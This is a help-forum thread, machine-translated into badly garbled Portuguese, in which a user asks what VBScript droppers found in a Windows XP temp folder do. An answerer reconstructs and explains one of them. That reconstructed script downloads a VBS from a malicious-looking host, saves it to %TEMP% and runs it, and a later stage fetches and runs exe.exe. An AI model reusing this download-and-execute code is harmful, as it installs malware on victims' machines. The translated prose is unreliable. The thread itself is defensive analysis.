Pergunta : Poderia um perito por favor tentar interpretar este código de VBS

Olá! o amigo do experts

A tem visto algum comportamento incomun com seu computador de Windows Xp SP3 IE7 sobre os pares passados de dias de que eu sou profundamente suspeito.  Eu observei que ele que acontece sobre uma conexão de VNC apenas que uma janela do curto período de tempo ago.

A CMD.EXE estala acima e obviamente a lima de waits.
A VBS abre no bloco de notas de Notepad.
When é fechado, a janela closes.

I am de CMD consideravelmente sure que este é um certificado malicioso que tenta funcionar a lima de VBS sem especific o programa (CScript ou WScript) para o funcionar, e porque eu ajustei a ação do defeito para a maioria de tipo tipos do “certificado” de lima ao “edito” a ação (bloco de notas) um pouco do que esse “aberto” (executar o certificado), a atividade maliciosa é provavelmente failing.

On a primeira ocasião que eu não testemunhei, a lima “yb.vbs” foi aberta no bloco de notas do dobrador de %TEMP% do usuário com o seguinte índice: class= " lineNumbers " >
1 do >

B= codeBody " yb.vbs " do " prettyprint " " do class= do id= " codeSnippet800241 do >
s de http://jyiop.com/kr/yb.vb” e serra que os índices eram crua “ofuscados” inverter por alguns dos parâmetros como mostrado abaixo: class= " lineNumbers " >
1 do >

w=3000 do id= " codeSnippet800242 " do >


I transferiu com segurança do “o nofollow provido " do” rel=” do _blank " do” target= " de http://jyiop.com/kr/hy/_q.php do href= o .php de http://jyiop.com/kr/hy/_q” para revelar este código: class= " lineNumbers " >
1 do >

o class= >

I de
excepto o alvo como > excepto como a lima de *.htm do mesmo nome) e com o código apropriado, de modo que possa apenas ser a resposta do usuário a minha tentativa de transferir o file.

Assuming o Relative URL iguala:  rel= " nofollow " do " _blank " " do target= de " http://jyiop.com/kr/_yoyk.php do href= do http://jyiop.com/kr/_yoyk. o php
then que resolve ao rel= " nofollow " do " _blank " " do target= de " http://www.google.com do href= do http://www.google.com
I am que testa este em meu próprio sistema com rel= " nofollow " do " _blank " " do target= de " http://www.google.co.uk do href= do http://www.google.co.uk como o Home Page, assim que eu sabemos que apenas não está reorientando a meu

On do Home Page. a ocasião subseqüente que eu testemunhei sobre VNC que um comando foi emitido obviamente funcionar a lima “uor.vbs” do dobrador de %TEMP% do usuário em uma janela do comando, e o caderno estalou acima contendo o certificado: class= " lineNumbers " >
1 do >

B= codeBody " uor.vbs " do " prettyprint " " do class= do id= " codeSnippet800244 do >


Safely do “do class= de
o bs de http://ypuii.com/k_/uor.v” em um editor de texto revelou o mesmos que antes, IE. strings.

Now, eu encontrei que “GetSpecialFolder (2)” refere o dobrador de %TEMP% do usuário, e eu posso ver que o certificado está transferindo a lima de VBS, criando um VBScript sobre - - voar concatenando cordas e cordas invertidas, mas pelo mim são incerto de exatamente o que um certificado como este é fazendo ou de tentativa a do.

I am não muito competente com o VBS diferentes de algum uso básico, assim que as seguintes referências são-me um enigma:

maertS.BDODA = ADOBD.Stream

c.open OT, a, z:
If de c.send () c.Status = x Then
u=c.ResponseBody: d.Open: d.Type = y: d.Write u: d.SaveToFile b: d.Close


I pode ver tão claramente quanto o dia que Windows Media Player está sendo matado fora se está funcionando (que não era nos tempos materiais), mas eu quero saber porque um certificado estaria fazendo a outra edição aparentemente significativa de this.

One é que eu descobri “um URL recentemente datilografado” na lista drop-down da barra do endereço do IE do usuário: o rel= " nofollow " do” _blank”” do target= de " http://ypuii.com/k_/zcus/efmjcg.pdf do href= do
o fmjcg.pdf
I de http://ypuii.com/k_/zcus/e não poderia encontrar que a lima psta em esconderijo em qualquer lugar no computador e na ela do usuário não pode mesmo recordar quando teria último abriu uma lima do pdf em seu navegador.  Eu conservei essa lima do pdf e, na inspeção em um editor de texto, eu posso ver algum índice do texto como algum tipo de código scripted e de uma referência ao “Javascript”.  O seguinte é igualmente desobstruído em um editor de texto:

/Author (yZ=ssA f V)
/gZ de MllZTgg (. s_JUNCVZa #8l=z 96yp2x de b LPD tv/-Xqrf4dY3M: ihwBQn E K7gATGe H de S5Rm k o 0&uFOcj%?
/Title de I1W) (qgMpr#AZMZH do Ng JGgG?)
/ModDate do
/Creator do
/Keywords (Mokomeuapaualimajsi) (Kotefekjoesito) (D: 20100621095906) o

Googling do
/Producer (820d5Deawohigejoxamogoga) apenas o “criador Kotefekjoesito” conhecido “” toma-me a esta página: rel= " nofollow " do” _blank”” do target= de " http://jsunpack.jeek.org/dec/go?report=c4cc162b45e937762035f286406a989f2adf2753 do href= do
ec/go de http://jsunpack.jeek.org/d? o report=c4cc162b45e937762035f286406a989f2adf2753
where mostra claramente que a lima é Malicious.

I pode somente supr que a referência mais adiantada no VBScript a “ADOBD.Stream” é uma referência a “Adobe”, e a um córrego em uma lima maliciosa crafted do pdf.  Eu posso somente supr que este era ou o começo da edição, ou que era uma lima buscou por um certificado malicioso, mas eu não pensaria que adicionaria o URL à lista recentemente datilografada do URL.  Isso está confundindo em itself.

Probably não que uma coincidência é que o StrReverse googling () de “maertS.BDODA " igualmente me toma do “ao local do de http://jsunpack.jeek.org " do nofollow " do” rel=” do _blank do” target= " de http://jsunpack.jeek.org do href= " com esta página: rel= " nofollow " do” _blank”” do target= de " http://jsunpack.jeek.org/dec/go?report=5d7727607489f01840f34855c5664e662488962e do href= do
ec/go de http://jsunpack.jeek.org/d? report=5d7727607489f01840f34855c5664e662488962e
but que não diz que que é malicious.

Could alguém satisfazer recomendam-me o que esse primeiro certificado é provável ter feito (ou ter tentado fazer) no computador do usuário.  Eu gostaria de saber onde eu estou, porque uma varredura cheia do AntiVirus + do RootKit do sistema não rendeu nenhum resultado positivo e eu não posso ver nenhuma referências às limas de VBS no

Bill
de registry.

Thanks adiantado
class= do

Resposta : Poderia um perito por favor tentar interpretar este código de VBS

Eu não sou disposto ir até a abertura dos Web site que você mencionou entretanto, dos certificados acima sou aqui o que eu ver…

O certificado 1 está criando uma lima em branco, as ligações a um Web site e a transferências o índice da página e as descargas ele na lima em branco.  Esta lima é conservada como “yb.vbs” e supor executar.
-------------------------------------------------------------------
B= " yb.vbs "
Com CreateObject (“MSXML2.XMLHTTP”)
      .open “COMEÇ”, “http://jyiop.com/kr/yb.vbs”, falso
      .send ()
      Ajustar A = CreateObject (“Scripting.FileSystemObject”)
      Ajustar D = A.CreateTextFile (A.GetSpecialFolder (2) + “\” + B)
      D.WriteLine .responseText
Extremidade com
D.Close
CreateObject (“WScript.Shell”). Funcionar A.GetSpecialFolder (2) +” \ “+ B
-------------------------------------------------------------------
Etapa 2 agora que a lima dos vbs foi criada e funcionamento, tenta visitar um outro Web page mas esta vez conserva o índice do Web page em uma lima chamada “exe.exe”.  Esta lima nova deve ser conservado no dobrador do temp dos usuários.
O certificado funciona então a lima “exe.exe”.
Como você mencionou, o taskkill para Windows Media Player - porque, que sabe?!?!
O certificado suprime então do certificado do vb que etapa 1 criou (o certificado que está funcionando atualmente).
Há uma segundo espera 3 a lima “exe.exe” é suprimida então que.

Esta parte;
[maertS.BDODA = ADOBD.Stream
c.open OT, a, z: c.send ()
Se c.Status = x então
u=c.ResponseBody: d.Open: d.Type = y: d.Write u: d.SaveToFile b: d.Close]
é o certificado que datilografa para abrir uma lima que flua no Web page - nada fazer com Adobe.  “c.Status” - o certificado está esperando o Web page para ser pronto e cabido para transferir. “u=c.ResponseBody” toma o Web page e shoves o em uma variável.  O córrego é aberto e o texto é transferido na variável.  A lima é conservada e fechado.  Neste certificado o Web page/lima é conservado no dobrador do temp como “exe.exe”.

O perigo real é que lima de “exe.exe”.  Uma vez que foi funcionado, não se pode dizer o que foi projetado fazer.

Esse computador é contaminado ainda com um vírus.  O programa “exe.exe” poderia ter transferido outros vírus no fundo para impedir varreduras do sistema.  O fato de que você pode ver a janela do comando aberta e o certificado são tentados funcionar dizem-me que há alguma lima maliciosa ainda que se atrasa.

Pode ser hora de avaliar que necessidades de ser conservado dessa máquina e começar novamente com uma reinstalação de Windows e de aplicações.  Soa dramático mas vendo como o antivirus não está detetando qualquer coisa fora das sortes mim pensar que você está no ponto de nenhum retorno.  Recordar isso contanto que o código malicioso estiver ligada lá, algum conduzem; é a vara da memória do USB, a câmera etc., pode potencial conter o vírus/Trojan, se foi unido à máquina.
Outras soluções  
 
programming4us programming4us